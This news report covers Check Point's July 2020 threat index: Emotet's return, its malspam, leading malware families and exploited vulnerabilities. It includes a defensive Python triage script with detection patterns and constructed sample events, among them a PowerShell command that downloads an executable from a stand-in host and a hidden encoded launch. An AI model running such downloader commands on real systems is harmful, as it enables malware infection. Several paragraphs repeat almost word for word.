Check Point Investigates the Reappearance of the Emotet Botnet in the July 2020 Global Threat Index

Check Point Research has published its latest Global Threat Index, covering July 2020. Researchers found that after a five-month absence, Emotet returned to the top of the index, affecting 5% of organizations worldwide.

From February 2020, Emotet’s activity, which consists mainly of sending waves of malspam campaigns, began to slow down and eventually ceased, until it reappeared in July. The same pattern was observed in 2019, when the Emotet botnet stopped operating during the summer months and resumed in September.

In July, Emotet ran malspam campaigns that infected its victims with TrickBot and Qbot, which are used to steal banking credentials and spread within networks. Some of the malspam campaigns contained malicious documents with names such as “form.doc” or “invoice.doc”. According to the researchers, the malicious document launches PowerShell to retrieve the Emotet binary from remote websites and infect the machine, adding it to the botnet. The resumption of Emotet operations highlights the scale and resilience of the botnet on a global level.
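As an added illustration (not code from Check Point’s report), the following triage routine looks for the infection chain described above, an Office document spawning PowerShell that fetches a binary from a remote host, in process-creation events. All events, file paths, command lines and hostnames below are constructed samples.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (parent image, child image,
# command line). The first two resemble a macro document launching a
# PowerShell downloader; the last two are benign-looking noise.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "child": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -enc SQBFAFgA"},            # constructed
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "child": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell (New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe','C:\Users\Public\x.exe')"},
    {"parent": r"C:\Windows\explorer.exe",
     "child": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Process"},
    {"parent": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "child": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c echo hello"},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")
# Command-line indicators of a downloader or of an obfuscated/hidden launch.
SUSPICIOUS_CMD = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|"
    r"\bhttps?://|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|frombase64string)",
    re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> str:
    """'high'   : Office app -> script host with downloader/obfuscation indicators
       'medium' : Office app -> script host without such indicators
       'none'   : anything else (non-Office parent or non-script child)"""
    if basename(event["parent"]) not in OFFICE_PARENTS:
        return "none"
    if basename(event["child"]) not in SCRIPT_HOSTS:
        return "none"
    if SUSPICIOUS_CMD.search(event["cmdline"]):
        return "high"
    return "medium"

def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (command line, severity) for every event that is not 'none'."""
    return [(e["cmdline"], classify(e)) for e in events if classify(e) != "none"]
```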

Emotet is the most prevalent malware, with a global impact on 5% of organizations, closely followed by Dridex and Agent Tesla.

“It is notable that Emotet remained inactive for several months earlier this year, repeating a trend we first observed in 2019. We can assume that the developers behind the botnet were updating its features and capabilities. But because it is active again, organizations should teach workers how to identify the types of malspam that carry these threats and warn them about the dangers of opening email attachments or clicking links from external sources. Companies should also implement anti-malware solutions that can prevent this content from reaching end users,” said Maya Horowitz, Director of Threat Intelligence and Research, Check Point Products.

The research team also warns that “MVPower DVR Remote Code Execution” is the most commonly exploited vulnerability, affecting 44% of organizations worldwide, followed by “OpenSSL TLS DTLS Heartbeat Information Disclosure”, which affects 42% of organizations worldwide. “Command Injection Over HTTP Payload” ranks third, with a global impact of 38%.

Emotet was originally a banking Trojan, but has recently been used as a distributor of other malware or malicious campaigns.

Emotet is the most prevalent malware, with a global impact on 5% of organizations, closely followed by Dridex and Agent Tesla, each affecting 4% of organizations.

Emotet: Emotet is an advanced, self-propagating, modular Trojan. Emotet was originally a banking Trojan, but has recently been used as a distributor of other malware or malicious campaigns. It uses multiple persistence mechanisms and evasion techniques to avoid detection. In addition, it can spread through phishing spam emails containing malicious links or attachments.

Dridex: Dridex is a Trojan that targets the Windows platform and is typically downloaded as a spam attachment. Dridex contacts a remote server and sends information about the infected system. It can also download and execute arbitrary modules received from the remote server.

Agent Tesla is an advanced RAT that operates as a keylogger and information stealer

Agent Tesla – Agent Tesla is an advanced RAT that functions as a keylogger and information stealer, capable of monitoring and collecting the victim’s keyboard input and system clipboard, taking screenshots, and exfiltrating credentials belonging to a variety of software installed on the victim’s machine (including Google Chrome, Mozilla Firefox and the Microsoft Outlook email client).

“MVPower DVR Remote Code Execution” is the most commonly exploited vulnerability, affecting 44% of organizations worldwide, followed by “OpenSSL TLS DTLS Heartbeat Information Disclosure”, which affects 42% of organizations worldwide. “Command Injection Over HTTP Payload” ranks third, with a global impact of 38%.

Among mobile malware, xHelper is the most prevalent, followed by Necro and PreAMo.

Check Point’s Global Threat Impact Index and its ThreatCloud Map are powered by Check Point’s ThreatCloud intelligence, the collaborative network to fight cybercrime, which delivers threat data and attack trends from a global network of threat sensors. The ThreatCloud database inspects over 2.5 billion websites and 500 million files daily, and identifies more than 250 million malware activities every day.
